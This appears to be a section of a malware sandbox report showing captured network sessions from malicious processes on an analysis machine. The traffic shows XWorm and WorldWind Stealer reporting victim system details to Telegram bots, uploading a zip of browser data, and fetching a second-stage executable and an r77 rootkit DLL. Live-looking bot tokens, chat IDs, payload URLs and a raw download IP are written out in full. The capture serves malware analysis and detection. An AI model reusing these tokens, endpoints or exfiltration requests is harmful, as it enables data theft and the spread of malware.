                                                  4192.168.2.549724104.16.185.241801716C:\Users\user\AppData\Roaming\svchost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 3, 2024 06:16:38.430104971 CEST63OUTGET / HTTP/1.1
                                                  Host: icanhazip.com
                                                  Connection: Keep-Alive
                                                  Sep 3, 2024 06:16:38.879524946 CEST534INHTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:38 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 12
                                                  Connection: keep-alive
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET
                                                  Set-Cookie: __cf_bm=ESrvyBH06a6s10B_EJYHoCaukxeaMZp_K1Hv0l5VrZw-1725336998-1.0.1.1-IcD.iR0xoZZUQDBJT7DGmHIam7kQ8NBXCFzFIM76xDH2iJu4xV6jX.W3HMbs.pFPD1u2miKev1ncw20rpUCwHQ; path=/; expires=Tue, 03-Sep-24 04:46:38 GMT; domain=.icanhazip.com; HttpOnly
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf2a9df19b2-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                  Data Ascii: 8.46.123.33


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.54974091.134.207.16802680C:\Users\user\AppData\Roaming\Window Security.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 3, 2024 06:16:56.779481888 CEST74OUTGET /svchost.exe HTTP/1.1
                                                  Host: 91.134.207.16
                                                  Connection: Keep-Alive


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549705149.154.167.2204435972C:\Users\user\AppData\Roaming\crack.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:15:58 UTC164OUTGET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:15:58 UTC388INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:15:58 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 300
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:15:58 UTC300INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 31 30 33 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 39 30 34 39 34 36 30 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 69 6c 76 61 37 38 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 69 6c 76 61 38 31 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 38 31 37 35 39 39 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 54 43 20 55 53 44 54 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 46 4c 41 53 48 5c 75 64 38 33 64 5c 75 64 64 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 66 6c 61 73 68 75 73 64 74 62 74 63 73 65 6e 64 65 72 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                                  Data Ascii: {"ok":true,"result":{"message_id":310366,"from":{"id":5904946097,"is_bot":true,"first_name":"Vilva789","username":"Vilva814bot"},"chat":{"id":5881759996,"first_name":"BTC USDT","last_name":"FLASH\ud83d\udd25","username":"flashusdtbtcsender","type":"privat


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.549708149.154.167.2204437140C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:05 UTC449OUTGET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:05 UTC346INHTTP/1.1 400 Bad Request
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:05 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 56
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:05 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.549721145.14.144.2314432680C:\Users\user\AppData\Roaming\Window Security.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:35 UTC94OUTGET /r77-x64.dll HTTP/1.1
                                                  Host: payloads-poison.000webhostapp.com
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:35 UTC281INHTTP/1.1 404 Not Found
                                                  Date: Tue, 03 Sep 2024 04:16:35 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 20319
                                                  Connection: close
                                                  ETag: "65dc8956-4f5f"
                                                  Server: awex
                                                  X-Xss-Protection: 1; mode=block
                                                  X-Content-Type-Options: nosniff
                                                  X-Request-ID: a049bd78bd228879c6cc6d046cfde157
                                                  2024-09-03 04:16:35 UTC16103INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 3d 73 2e 67 65 74
                                                  Data Ascii: <!doctype html><html lang="en-us"><head> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.get
                                                  2024-09-03 04:16:35 UTC4216INData Raw: 30 30 30 77 65 62 68 6f 73 74 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 64 65 66 61 75 6c 74 2e 30 30 30 77 65 62 68 6f 73 74 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 63 64 6e 2f 63 6f 72 67 69 2d 65 61 74 69 6e 67 2d 61 2d 63 61 73 73 65 74 74 65 2e 73 76 67 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 6d 61 67 65 22 20 61 6c 74 3d 22 44 6f 67 20 65 61 74 69 6e 67 20 63 61 73 73 65 74 74 65 20 74 61 70 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 63 72 6f 6c 6c 2d 68 6f 6c 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 63 72 6f 6c 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d
                                                  Data Ascii: 000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg" class="main-image" alt="Dog eating cassette tape"> </div> <div class="scroll-holder"> <div class="icon-scroll"></div> <span class=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.549726172.67.196.1144431716C:\Users\user\AppData\Roaming\svchost.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:39 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                  Host: api.mylnikov.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:40 UTC785INHTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Content-Type: application/json; charset=utf8
                                                  Content-Length: 88
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: max-age=2678400
                                                  CF-Cache-Status: MISS
                                                  Last-Modified: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDrwTUuoNr%2BbET8Re0%2Fl0Td0fmw6h%2B77ndMI1%2BAtqrpPuyQ2pV9R5jHNSQcvlaPp3GrNzFAc2ltVXxxjJXPoFfAJZxqm4E94bb3OO3UutVdc994HEW64TJwtt2gP%2BfLXfe%2FH"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Strict-Transport-Security: max-age=0; preload
                                                  X-Content-Type-Options: nosniff
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf8999e1829-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-03 04:16:40 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 35 33 33 37 30 30 30 7d
                                                  Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1725337000}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.549725172.67.196.1144431632C:\Users\user\AppData\Roaming\update.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:39 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                  Host: api.mylnikov.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:40 UTC782INHTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Content-Type: application/json; charset=utf8
                                                  Content-Length: 88
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: max-age=2678400
                                                  CF-Cache-Status: HIT
                                                  Age: 0
                                                  Last-Modified: Tue, 03 Sep 2024 04:16:40 GMT
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0ImaJWwwcPzej7nFR10GJ%2BObq0yGpVZ1fR6plGExNDjiqh3gvqhtaYQzRl0t20I4snO0BtrbzRDTMXeDXHdEyfhi8vXtxuRzbkcTPZDOTvEKisvAMzTc5N9RH7iiBZlZ45q"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Strict-Transport-Security: max-age=0; preload
                                                  X-Content-Type-Options: nosniff
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf9a874c35d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-03 04:16:40 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 35 33 33 37 30 30 30 7d
                                                  Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1725337000}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.549728149.154.167.2204431716C:\Users\user\AppData\Roaming\svchost.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:41 UTC1756OUTGET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%2 [TRUNCATED]
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:41 UTC389INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:41 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 1997
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:41 UTC1997INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 39 36 33 31 38 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 64 78 33 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 64 78 33 31 32 31 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 39 31 37 34 39 31 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 35 33 33 37 30 30 31 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 63 5c 75 64 66 32 61 20 57 6f 72 6c 64 57 69 6e 64 20 53 74 65 61 6c 65 72 20 32 2e 30 2e 34 20 2d 20 52 65 73 75 6c
                                                  Data Ascii: {"ok":true,"result":{"message_id":6742,"from":{"id":7479631857,"is_bot":true,"first_name":"vdx3bot","username":"vdx3121Bot"},"chat":{"id":6291749148,"first_name":"VD","type":"private"},"date":1725337001,"text":"\ud83c\udf2a WorldWind Stealer 2.0.4 - Resul


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.549729149.154.167.2204431632C:\Users\user\AppData\Roaming\update.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:41 UTC1809OUTGET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%2 [TRUNCATED]
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-03 04:16:41 UTC346INHTTP/1.1 400 Bad Request
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:41 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 56
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:41 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.549730149.154.167.2204431632C:\Users\user\AppData\Roaming\update.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:42 UTC171OUTGET /bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                  Host: api.telegram.org
                                                  2024-09-03 04:16:42 UTC346INHTTP/1.1 400 Bad Request
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:42 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 56
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:42 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.549731149.154.167.2204431716C:\Users\user\AppData\Roaming\svchost.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:42 UTC171OUTGET /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                  Host: api.telegram.org
                                                  2024-09-03 04:16:42 UTC388INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:42 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 251
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-03 04:16:42 UTC251INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 39 36 33 31 38 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 64 78 33 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 64 78 33 31 32 31 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 39 31 37 34 39 31 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 35 33 33 37 30 30 32 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 63 31 20 55 70 6c 6f 61 64 69 6e 67 20 4c 6f 67 20 46 6f 6c 64 65 72 73 2e 2e 2e 22 7d 7d
                                                  Data Ascii: {"ok":true,"result":{"message_id":6743,"from":{"id":7479631857,"is_bot":true,"first_name":"vdx3bot","username":"vdx3121Bot"},"chat":{"id":6291749148,"first_name":"VD","type":"private"},"date":1725337002,"text":"\ud83d\udcc1 Uploading Log Folders..."}}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.549733149.154.167.2204431716C:\Users\user\AppData\Roaming\svchost.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:43 UTC254OUTPOST /bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary="8f1a5687-0088-49e7-8d36-ee41abb7c508"
                                                  Host: api.telegram.org
                                                  Content-Length: 160724
                                                  Expect: 100-continue
                                                  2024-09-03 04:16:44 UTC25INHTTP/1.1 100 Continue
                                                  2024-09-03 04:16:44 UTC40OUTData Raw: 2d 2d 38 66 31 61 35 36 38 37 2d 30 30 38 38 2d 34 39 65 37 2d 38 64 33 36 2d 65 65 34 31 61 62 62 37 63 35 30 38 0d 0a
                                                  Data Ascii: --8f1a5687-0088-49e7-8d36-ee41abb7c508
                                                  2024-09-03 04:16:44 UTC269OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 34 39 33 64 31 63 63 64 65 38 39 34 34 65 30 66 62 35 66 66 62 65 39 62 31 33 37 32 32 34 34 5c 61 6c 66 6f 6e 73 40 39 33 36 39 30 35 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 34 39 33 64 31 63 63 64 65 38 39 34 34 65 30 66 62 35 66 66 62 65 39 62 31 33 37 32 32 34 34 25 35 43 61 6c 66 6f 6e 73 25 34 30 39 33 36 39 30 35
                                                  Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9493d1ccde8944e0fb5ffbe9b1372244%5Cuser%40936905
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b3 28 23 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 b3 28 23 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 02 02 23 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae 54 f0 cb 2f c9 4c 4e 55 78 d4 30 45 c1 37 bf 2a 33 27 27 51 41 19 a8 4c 23 a3 a4 a4 a0 d8 4a 5f bf bc bc 5c 2f 17 22 a1 97 5f 94 ae 9f 9a a7 1b 1a ac 5f 00 d1 ad 9f 06 31 4d 5f 53 c1 90 0b 00 50 4b 03 04 14 00 00 00 08 00 02 02 23 59 30 82 18 88 35 01 00 00 2e 03
                                                  Data Ascii: PK(#YBrowsers\Edge\PK(#YBrowsers\Google\PK#YceS^Browsers\Firefox\History.txtSVVVp,JMP(,KLT/LNUx0E7*3''QAL#J_\/"__1M_SPK#Y05.
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: fa 82 6f a5 13 92 78 6b 4d bb 60 a4 42 6b b5 f7 fd 4e c2 5a 94 2c 77 91 92 f7 f5 dc 64 f9 e2 84 96 40 ba ab c8 b1 b9 ec 5e 3a 30 b3 f7 3e 25 8f f6 dc 14 e7 d5 37 28 47 0e 1b 43 4b f1 a3 4f fc 0d 48 93 0e 86 33 d5 e9 6d cb a2 8a 49 a6 d4 43 54 0c 4b 9b 7d ec 65 4a a9 01 d7 d9 25 59 15 b8 11 d9 ee ce 4c 3c 92 74 33 a7 f1 d6 58 54 98 c5 c2 41 c4 fd 3e ce f5 5e 6f 15 e6 ad 78 c9 94 74 70 4e 1f 06 c1 de 51 49 cc 47 ca be b1 e8 b3 4e f6 6b ab b8 c1 fb 11 e7 e7 67 b8 3a 8a 7f de d4 ea 6d 31 94 ab 30 0c e4 21 58 3e 7b 95 77 c0 5f 0d 64 82 81 1b f5 2a b5 0b dd 7e dc f3 bc 53 92 94 6b d3 c4 62 a8 25 7f b8 6b ca b8 09 3e 58 e0 ca e4 ac a9 8a 0a 1d 43 8d 90 0f 5a 67 9c eb 0a 3c 0e 1a 4f c7 1a f6 a6 5a 5d 79 99 dc b9 b3 85 7a 47 18 ca b1 aa 94 e3 53 3b ab 43 6e 06 73
                                                  Data Ascii: oxkM`BkNZ,wd@^:0>%7(GCKOH3mICTK}eJ%YL<t3XTA>^oxtpNQIGNkg:m10!X>{w_d*~Skb%k>XCZg<OZ]yzGS;Cns
